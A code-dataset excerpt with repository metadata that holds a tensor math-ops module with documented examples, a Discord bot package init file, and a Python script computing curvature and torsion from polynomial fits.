print(torch.bitwise_or(a, b)) # [-4, -1, -2, -3, 4]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The first input tensor.
other : dragon.vm.torch.Tensor
The second input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'BitwiseOr', out)
def bitwise_xor(input, other, out=None):
r"""Compute the element-wise XOR bitwise operation.
.. math:: \text{out} = \text{input} \oplus \text{other}
Examples:
```python
a = torch.tensor([0, -1, 2, -3, 4])
b = torch.tensor([-4, 3, -2, 1, 0])
print(torch.bitwise_xor(a, b)) # [-4, -4, -4, -4, 4]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The first input tensor.
other : dragon.vm.torch.Tensor
The second input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'BitwiseXor', out)
def bmm(input, mat2, out=None):
r"""Compute the batched matrix-matrix multiplication.
.. math:: \text{out}_{i} = \text{input}_{i} \times \text{mat2}_{i}
Parameters
----------
input : dragon.vm.torch.Tensor
The first batch of matrices.
mat2 : dragon.vm.torch.Tensor
The second batch of matrices.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return Function.apply(
'MatMul', input.device, [input, mat2], outputs=[out])
def cast(input, dtype='float32', out=None):
"""Cast the data type of input.
Parameters
----------
input : dragon.vm.torch.Tensor
The input.
dtype : str, optional, default='float32'
The data type to cast to.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return Function.apply(
'Cast', input.device, [input], outputs=[out], dtype=dtype)
def ceil(input, out=None):
r"""Compute the smallest integer not less than input.
.. math:: \text{out} = \lceil \text{input} \rceil
Examples:
```python
x = torch.tensor([1.4, 1.7, 2.0])
print(torch.ceil(x)) # [2., 2., 2.]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Ceil', out)
def clamp(input, min=None, max=None, out=None):
r"""Compute the clipped input according to the given bounds.
.. math:: \text{out} = \min(\max(\text{input}, low), high)
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
min : number, optional
The min value.
max : number, optional
The max value.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
low = float(min) if min is not None else None
high = float(max) if max is not None else None
return Function.apply(
'Clip', input.device, [input], outputs=[out], low=low, high=high)
def cos(input, out=None):
r"""Compute the cos of input.
.. math:: \text{out} = \cos(\text{input})
Examples:
```python
x = torch.tensor([0., math.pi])
print(torch.cos(x)) # [1., -1.]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Cos', out)
def cumsum(input, dim, out=None):
"""Compute the cumulative sum of elements along the given dimension.
:attr:`dim` could be negative:
```python
# A negative dimension is the last-k dimension
x = torch.tensor([[1, 2, 3], [4, 5, 6]])
print(torch.cumsum(x, dim=1)) # [[1, 3, 6], [4, 9, 15]]
print(torch.cumsum(x, dim=-1)) # Equivalent
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
dim : int
The cumulative dimension.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return Function.apply(
'CumSum', input.device, [input], outputs=[out], axis=dim)
def div(input, other, out=None):
r"""Compute the element-wise division.
.. math:: \text{out} = \text{input} \div \text{other}
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to divide.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Div', out)
def eq(input, other, out=None):
r"""Compute the element-wise equal comparison.
.. math:: \text{out} = (\text{input} == \text{other})
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to compare.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Equal', out)
def exp(input, out=None):
r"""Compute the exponential of input.
.. math:: \text{out} = \exp(\text{input})
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Exp', out)
def floor(input, out=None):
r"""Compute the largest integer not greater than input.
.. math:: \text{out} = \lfloor \text{input} \rfloor
Examples:
```python
x = torch.tensor([0.9, 1.4, 1.9])
print(torch.floor(x)) # [0., 1., 1.]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Floor', out)
def ge(input, other, out=None):
r"""Compute the element-wise greater-equal comparison.
.. math:: \text{out} = (\text{input} \geq \text{other})
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to compare.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'GreaterEqual', out)
def gt(input, other, out=None):
r"""Compute the element-wise greater comparison.
.. math:: \text{out} = (\text{input} > \text{other})
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to compare.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output byte tensor.
"""
return _binary_func(input, other, 'Greater', out)
def isfinite(input):
r"""Check if the elements of input are finite.
.. math:: \text{out} = \text{isfinite}(\text{input})
Examples:
```python
x = torch.tensor([0., float('nan'), float('inf')])
print(torch.isfinite(x)) # [True, False, False]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'IsFinite')
def isinf(input):
r"""Check if the elements of input are infinite.
.. math:: \text{out} = \text{isinf}(\text{input})
Examples:
```python
x = torch.tensor([0., 1., float('inf')])
print(torch.isinf(x)) # [False, False, True]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'IsInf')
def isnan(input):
r"""Check if the elements of input are NaN.
.. math:: \text{out} = \text{isnan}(\text{input})
Examples:
```python
x = torch.tensor([0., 1., float('nan')])
print(torch.isnan(x)) # [False, False, True]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'IsNaN')
def le(input, other, out=None):
r"""Compute the element-wise less-equal comparison.
.. math:: \text{out} = (\text{input} \leq \text{other})
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to compare.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output byte tensor.
"""
return _binary_func(input, other, 'LessEqual', out)
def log(input, out=None):
r"""Compute the natural logarithm of input.
.. math:: \text{out} = \log(\text{input})
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Log', out)
def logical_and(input, other, out=None):
r"""Compute the element-wise AND logical operation.
.. math:: \text{out} = \text{input} \mathbin{\&} \text{other}
Examples:
```python
a = torch.tensor([False, True, False, True])
b = torch.tensor([False, True, True, False])
c = torch.Tensor([0, 1, 0, 2])
d = torch.Tensor([0, 3, 4, 0])
print(torch.logical_and(a, b)) # [False, True, False, False]
print(torch.logical_and(c, d)) # [False, True, False, False]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The first input tensor.
other : dragon.vm.torch.Tensor
The second input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'And', out)
def logical_not(input, out=None):
r"""Compute the element-wise NOT logical operation.
.. math:: \text{out} = \,\,\sim \text{input}
Examples:
```python
a = torch.tensor([False, True, True])
b = torch.tensor([0, 1, 2])
print(torch.logical_not(a)) # [True, False, False]
print(torch.logical_not(b)) # [True, False, False]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Not', out)
def logical_or(input, other, out=None):
r"""Compute the element-wise OR logical operation.
.. math:: \text{out} = \text{input} \mathbin{|} \text{other}
Examples:
```python
a = torch.tensor([False, True, False, True])
b = torch.tensor([False, True, True, False])
c = torch.Tensor([0, 1, 0, 2])
d = torch.Tensor([0, 3, 4, 0])
print(torch.logical_or(a, b)) # [False, True, True, True]
print(torch.logical_or(c, d)) # [False, True, True, True]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The first input tensor.
other : dragon.vm.torch.Tensor
The second input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Or', out)
def logical_xor(input, other, out=None):
r"""Compute the element-wise XOR logical operation.
.. math:: \text{out} = \text{input} \oplus \text{other}
Examples:
```python
a = torch.tensor([False, True, False, True])
b = torch.tensor([False, True, True, False])
c = torch.Tensor([0, 1, 0, 2])
d = torch.Tensor([0, 3, 4, 0])
print(torch.logical_xor(a, b)) # [False, False, True, True]
print(torch.logical_xor(c, d)) # [False, False, True, True]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The first input tensor.
other : dragon.vm.torch.Tensor
The second input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Xor', out)
def logsumexp(input, dim, keepdim=False, out=None):
r"""Apply the composite of log, sum, and exp to input.
.. math:: \text{out}_{i} = \log\sum_{j}\exp(\text{input}_{ij})
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
dim : Union[int, Sequence[int]]
The dimension(s) to reduce.
keepdim : bool, optional, default=False
Whether the output tensor has dim retained or not.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return log(exp(input).sum(dim, keepdim), out)
def lt(input, other, out=None):
r"""Compute the element-wise less comparison.
.. math:: \text{out} = (\text{input} < \text{other})
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to compare.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output byte tensor.
"""
return _binary_func(input, other, 'Less', out)
def matmul(input, other, out=None):
r"""Compute the matrix multiplication.
.. math:: \text{out} = \text{input} \times \text{other}
The behavior depends on the shape of input tensors:
* If both tensors are 1d, computes the vector product.
* If tensors are 1d and >=2d, computes the vector-matrix multiplication.
* If tensors are >=2d and 1d, computes the matrix-vector multiplication.
* If both tensors are >= 2d, computes the matrix-matrix multiplication.
* If one tensor is >= 3d, applies batching and broadcasting to the computation.
Examples:
```python
# Vector x Vector
a = torch.ones(2)
b = torch.ones(2)
print(torch.matmul(a, b))
# Vector x Matrix
a = torch.ones(2)
b = torch.ones(2, 3)
print(torch.matmul(a, b))
# Matrix x Vector
a = torch.ones(3, 2)
b = torch.ones(2)
print(torch.matmul(a, b))
# Matrix x Matrix
a = torch.ones(2, 3)
b = torch.ones(3, 2)
print(torch.matmul(a, b))
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : dragon.vm.torch.Tensor
The tensor to multiply.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return Function.apply(
'MatMul', input.device, [input, other], outputs=[out])
def max(input, dim=None, keepdim=False, out=None):
"""Compute the max value of elements along the given dimension.
:attr:`dim` could be negative or ``None``:
```python
x = torch.tensor([[1, 2, 3], [4, 5, 6]])
# A negative dimension is the last-k dimension
print(torch.max(x, dim=1))
print(torch.max(x, dim=-1)) # Equivalent
# If dimension is None, reduce input as a vector
# and return a scalar result
print(torch.max(x)) # 6
# Also, dimension could be a sequence of integers
print(torch.max(x, (0, 1))) # 6
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
dim : Union[int, Sequence[int]], optional
The dimension to reduce.
keepdim : bool, optional, default=False
Keep the reduced dimension or not.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
keepdim = keepdim if dim is not None else False
dim = nest.flatten(dim) if dim is not None else dim
return Function.apply(
'ReduceMax', input.device, [input], outputs=[out],
axes=dim, keepdims=keepdim)
def maximum(input, other, out=None):
r"""Compute the maximum value of inputs.
.. math:: \text{out} = \max(\text{input}, \text{other})
Parameters
----------
input : Union[dragon.vm.torch.Tensor, number]
The first input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The second input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Maximum', out)
def mean(input, dim=None, keepdim=False, out=None):
"""Compute the mean value of elements along the given dimension.
:attr:`dim` could be negative or ``None``:
```python
x = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
# A negative dimension is the last-k dimension
print(torch.mean(x, dim=1))
print(torch.mean(x, dim=-1)) # Equivalent
# If dimension is None, reduce input as a vector
# and return a scalar result
print(torch.mean(x)) # 3.5
# Also, dimension could be a sequence of integers
print(torch.mean(x, dim=(0, 1))) # 3.5
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
dim : Union[int, Sequence[int]], optional
The dimension to reduce.
keepdim : bool, optional, default=False
Keep the reduced dimension or not.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
keepdim = keepdim if dim is not None else False
dim = nest.flatten(dim) if dim is not None else dim
return Function.apply(
'ReduceMean', input.device, [input], outputs=[out],
axes=dim, keepdims=keepdim)
def min(input, dim=None, keepdim=False, out=None):
"""Compute the min value of elements along the given dimension.
:attr:`dim` could be negative or ``None``:
```python
x = torch.tensor([[1, 2, 3], [4, 5, 6]])
# A negative dimension is the last-k dimension
print(torch.min(x, dim=1))
print(torch.min(x, dim=-1)) # Equivalent
# If dimension is None, reduce input as a vector
# and return a scalar result
print(torch.min(x)) # 1
# Also, dimension could be a sequence of integers
print(torch.min(x, (0, 1))) # 1
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
dim : Union[int, Sequence[int]], optional
The dimension to reduce.
keepdim : bool, optional, default=False
Keep the reduced dimension or not.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
keepdim = keepdim if dim is not None else False
dim = nest.flatten(dim) if dim is not None else dim
return Function.apply(
'ReduceMin', input.device, [input], outputs=[out],
axes=dim, keepdims=keepdim)
def minimum(input, other, out=None):
r"""Compute the minimum value of inputs.
.. math:: \text{out} = \min(\text{input}, \text{other})
Parameters
----------
input : Union[dragon.vm.torch.Tensor, number]
The first input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The second input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Minimum', out)
def mm(input, mat2, out=None):
r"""Compute the matrix-matrix multiplication.
.. math:: \text{out} = \text{input} \times \text{mat2}
Parameters
----------
input : dragon.vm.torch.Tensor
The first matrix.
mat2 : dragon.vm.torch.Tensor
The second matrix.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return Function.apply(
'Gemm', input.device, [input, mat2], outputs=[out])
def mul(input, other, out=None):
r"""Compute the element-wise multiplication.
.. math:: \text{out} = \text{input} \times \text{other}
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to multiply.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Mul', out)
def ne(input, other, out=None):
r"""Compute the element-wise not-equal comparison.
.. math:: \text{out} = (\text{input} \neq \text{other})
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to compare.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output byte tensor.
"""
return _binary_func(input, other, 'NotEqual', out)
def neg(input, out=None):
r"""Compute the element-wise negative.
.. math:: \text{out} = -\text{input}
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Neg', out)
def norm(input, p='fro', dim=None, keepdim=False, out=None, dtype=None):
"""Compute the norm value of elements along the given dimension.
:attr:`dim` could be negative or ``None``:
```python
x = torch.tensor([[1., 2., 3.], [4., 5., 6.]])
# A negative dimension is the last-k axis
print(torch.norm(x, dim=1))
print(torch.norm(x, dim=-1)) # Equivalent
# If ``dim`` is None, the vector-style reduction
# will be applied to return a scalar result
print(torch.norm(x)) # 9.539
# Also, ``dim`` could be a sequence of integers
print(torch.norm(x, dim=(0, 1))) # 9.539
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
p : {'fro', 1, 2}, optional
The norm order.
dim : Union[int, Sequence[int]], optional
The dimension to reduce.
keepdim : bool, optional, default=False
Keep the reduced dimension or not.
out : dragon.vm.torch.Tensor, optional
The output tensor.
dtype : str, optional
The data type to cast to.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
if p is None or p == 2 or p == 'fro':
op_type = 'ReduceL2'
elif p == 1:
op_type = 'ReduceL1'
else:
raise ValueError('Unsupported norm order: ' + str(p))
input = input.to(dtype=dtype)
keepdim = keepdim if dim is not None else False
dim = nest.flatten(dim) if dim is not None else dim
return Function.apply(
op_type, input.device, [input], outputs=[out],
axes=dim, keepdims=keepdim)
def pow(input, exponent, out=None):
r"""Compute the power of input.
.. math:: \text{out} = \text{input}^{\text{exponent}}
The two inputs should be broadcast to each other:
```python
x = torch.tensor([[2, 2]])
print(torch.pow(x, x)) # [[4, 4]]
print(torch.pow(x, 3)) # [[8, 8]]
print(torch.pow(3, x)) # [[9, 9]]
```
Parameters
----------
input : Union[dragon.vm.torch.Tensor, number]
The input tensor.
exponent : Union[dragon.vm.torch.Tensor, number]
The exponent tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, exponent, 'Pow', out)
def reciprocal(input, out=None):
r"""Compute the reciprocal of input.
.. math:: \text{out} = \frac{1}{\text{input}}
Examples:
```python
x = torch.tensor([0., 1., 2.])
print(torch.reciprocal(x)) # [inf, 1., 0.5]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Reciprocal', out)
def round(input, out=None):
r"""Compute the nearest integer of input.
.. math:: \text{out} = \lfloor \text{input} \rceil
Examples:
```python
x = torch.tensor([0.9, 1.4, 1.9])
print(torch.round(x)) # [1., 1., 2.]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Round', out)
def rsqrt(input, out=None):
r"""Compute the reciprocal square root of input.
.. math:: \text{out} = \frac{1}{\sqrt{\text{input}}}
Examples:
```python
x = torch.tensor([0., 4., 16.])
print(torch.rsqrt(x)) # [inf, 0.5, 0.25]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Rsqrt', out)
def sign(input, out=None):
r"""Compute the sign indication of input.
.. math::
\text{out}_{i} =
\begin{cases}
-1, & \text{ if } \text{input}_{i} < 0 \\
0, & \text{ if } \text{input}_{i} = 0 \\
1, & \text{ if } \text{input}_{i} > 0
\end{cases}
Examples:
```python
x = torch.tensor([-2, 0, 2])
print(torch.sign(x)) # [-1, 0, 1]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Sign', out)
def sin(input, out=None):
r"""Compute the sin of input.
.. math:: \text{out} = \sin(\text{input})
Examples:
```python
x = torch.tensor([0., math.pi / 2])
print(torch.sin(x)) # [0., 1.]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Sin', out)
def sqrt(input, out=None):
r"""Compute the square root of input.
.. math:: \text{out} = \sqrt{\text{input}}
Examples:
```python
x = torch.tensor([4., 9., 16.])
print(torch.sqrt(x)) # [2., 3., 4.]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Sqrt', out)
def square(input, out=None):
r"""Compute the square of input.
.. math:: \text{out} = \text{input}^{2}
Examples:
```python
x = torch.tensor([2., 3., 4.])
print(torch.square(x)) # [4., 9., 16.]
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _unary_func(input, 'Square', out)
def sub(input, other, out=None):
r"""Compute the element-wise subtraction.
.. math:: \text{out} = \text{input} - \text{other}
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
other : Union[dragon.vm.torch.Tensor, number]
The tensor to subtract.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
return _binary_func(input, other, 'Sub', out)
def sum(input, dim=None, keepdim=False, out=None):
"""Compute the sum value of elements along the given dimension.
:attr:`dim` could be negative or ``None``:
```python
x = torch.tensor([[1, 2, 3], [4, 5, 6]])
# A negative dimension is the last-k dimension
print(torch.sum(x, dim=1))
print(torch.sum(x, dim=-1)) # Equivalent
# If dimension is None, reduce input as a vector
# and return a scalar result
print(torch.sum(x)) # 21
# Also, dimension could be a sequence of integers
print(torch.sum(x, (0, 1))) # 21
```
Parameters
----------
input : dragon.vm.torch.Tensor
The input tensor.
dim : Union[int, Sequence[int]], optional
The dimension to reduce.
keepdim : bool, optional, default=False
Keep the reduced dimension or not.
out : dragon.vm.torch.Tensor, optional
The output tensor.
Returns
-------
dragon.vm.torch.Tensor
The output tensor.
"""
keepdim = keepdim if dim is not None else False
dim = nest.flatten(dim) if dim is not None else dim
return Function.apply(
'ReduceSum', input.device, [input], outputs=[out],
axes=dim, keepdims=keepdim)
def _binary_func(input, value, op_type, out=None):
"""Compute a binary function."""
input, value = constant_ops.remove_scalars(input, value)
return Function.apply(
op_type, input.device, [input, value], outputs=[out])
def _unary_func(input, op_type, out=None):
"""Compute an unary function."""
return Function.apply(
op_type, input.device, [input], outputs=[out])
| 23.753079
| 87
| 0.583409
| 4,969
| 38,575
| 4.500906
| 0.065607
| 0.113615
| 0.108697
| 0.157165
| 0.834652
| 0.806081
| 0.768791
| 0.728147
| 0.705924
| 0.653163
| 0
| 0.013368
| 0.263072
| 38,575
| 1,623
| 88
| 23.767714
| 0.773384
| 0.694284
| 0
| 0.157143
| 0
| 0
| 0.045577
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.266667
| false
| 0
| 0.028571
| 0
| 0.561905
| 0.004762
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
e3a9b81e82e2fc1d728762e2fa3fd57a408e7d85
| 702
|
py
|
Python
|
moca_bot/__init__.py
|
el-ideal-ideas/MendakoDiscordBot
|
bc9fe8e85465671a509bee701b5f8eee9a6044d3
|
[
"MIT"
] | 1
|
2020-07-09T06:48:45.000Z
|
2020-07-09T06:48:45.000Z
|
moca_bot/__init__.py
|
el-ideal-ideas/ShirotakoDiscordBot
|
432b998b1ba255b6c626f3297fc92d3be0159ed1
|
[
"MIT"
] | null | null | null |
moca_bot/__init__.py
|
el-ideal-ideas/ShirotakoDiscordBot
|
432b998b1ba255b6c626f3297fc92d3be0159ed1
|
[
"MIT"
] | null | null | null |
# Ω*
# ■ ■■■■■
# ■ ■■ ■■
# ■ ■■ ■
# ■ ■■
# ■■■■■ ■ ■■■
# ■■ ■■ ■ ■■■
# ■■ ■■ ■ ■■■■
# ■■ ■■ ■ ■■■■
# ■■■■■■■■■ ■ ■■■
# ■■ ■ ■■
# ■■ ■ ■■
# ■■ ■ ■ ■■ ■■
# ■■ ■■ ■ ■■■ ■■■ ■■
# ■■■■■ ■ ■■■ ■■■■■
# -- Imports --------------------------------------------------------------------------
from .MocaBot import MocaBot
# -------------------------------------------------------------------------- Imports --
| 30.521739
| 87
| 0.055556
| 56
| 702
| 2.678571
| 0.196429
| 0.24
| 0.233333
| 0.12
| 0.253333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.542735
| 702
| 22
| 88
| 31.909091
| 0.121495
| 0.903134
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
5836de3345e28c47521d4611d447b6bd39a7ead7
| 2,638
|
py
|
Python
|
SSnet_GNN/code/pnfit.py
|
ekraka/SSnet
|
6a28140b2e54e5415553609a612fcae92f9103f0
|
[
"MIT"
] | 20
|
2020-01-23T07:29:27.000Z
|
2022-03-22T12:38:33.000Z
|
SSnet_GNN/code/pnfit.py
|
ekraka/SSnet
|
6a28140b2e54e5415553609a612fcae92f9103f0
|
[
"MIT"
] | 3
|
2020-05-19T18:43:19.000Z
|
2021-07-30T16:13:48.000Z
|
SSnet_GNN/code/pnfit.py
|
ekraka/SSnet
|
6a28140b2e54e5415553609a612fcae92f9103f0
|
[
"MIT"
] | 5
|
2020-02-07T18:55:23.000Z
|
2021-07-15T01:43:47.000Z
|
#curvature/torsion calculation of polynormial fitted line of axis
#2nd, 3rd and 5th order polynormial
from math import *
from utils import *
#5th order
def pfit(fth,t):
nf=len(fth)
o=nf-1
L=t
A=fth
# for a in A:
# print a
#for each points
D1,D2,D3=[],[],[]
kapa,tora=[],[]
crds=[]
for r in xrange(L):
#each point has xyz coordindates
d1,d2,d3=[],[],[]
crd=[]
t=r+1
for i in range(3):
# for j in range(3):
ca=A[i]
# print ca
d1.append(ca[1]+ca[2]*t*2+ca[3]*t*t*3+ca[4]*t**3*4+ca[5]*t**4*5)
d2.append(ca[2]*2+ca[3]*t*6+ca[4]*t**2*12+ca[5]*t**3*20)
d3.append(ca[3]*6+ca[4]*t*12*2+ca[5]*t**2*20*3)
crd.append(ca[0]+ca[1]*t+ca[2]*t**2+ca[3]*t**3+ca[4]*t**4+ca[5]*t**5)
D1.append(d1)
D2.append(d2)
D3.append(d3)
# print crd
# print d1
dcf=[]
kap=curv(d1,d2)
tor=tors(d1,d2,d3)
kapa.append(kap)
tora.append(tor)
# print 'cur'
# for a in kapa:
# print a
# print 'tor'
# for a in tora:
# print a
return([kapa,tora])
#3rd order
def pfit3(fth,t):
nf=len(fth)
o=nf-1
L=t
A=fth
# for a in A:
# print a
#for each points
D1,D2,D3=[],[],[]
kapa,tora=[],[]
crds=[]
for r in xrange(L):
#each point has xyz coordindates
d1,d2,d3=[],[],[]
crd=[]
t=r+1
for i in range(3):
# for j in range(3):
ca=A[i]
# print ca
d1.append(ca[1]+ca[2]*t*2+ca[3]*t*t*3)
d2.append(ca[2]*2+ca[3]*t*6)
d3.append(ca[3]*6)
crd.append(ca[0]+ca[1]*t+ca[2]*t**2+ca[3]*t**3)
D1.append(d1)
D2.append(d2)
D3.append(d3)
# print crd
# print d1
dcf=[]
kap=curv(d1,d2)
tor=tors(d1,d2,d3)
kapa.append(kap)
tora.append(tor)
# print 'cur'
# for a in kapa:
# print a
# print 'tor'
# for a in tora:
# print a
return([kapa,tora])
#2nd order
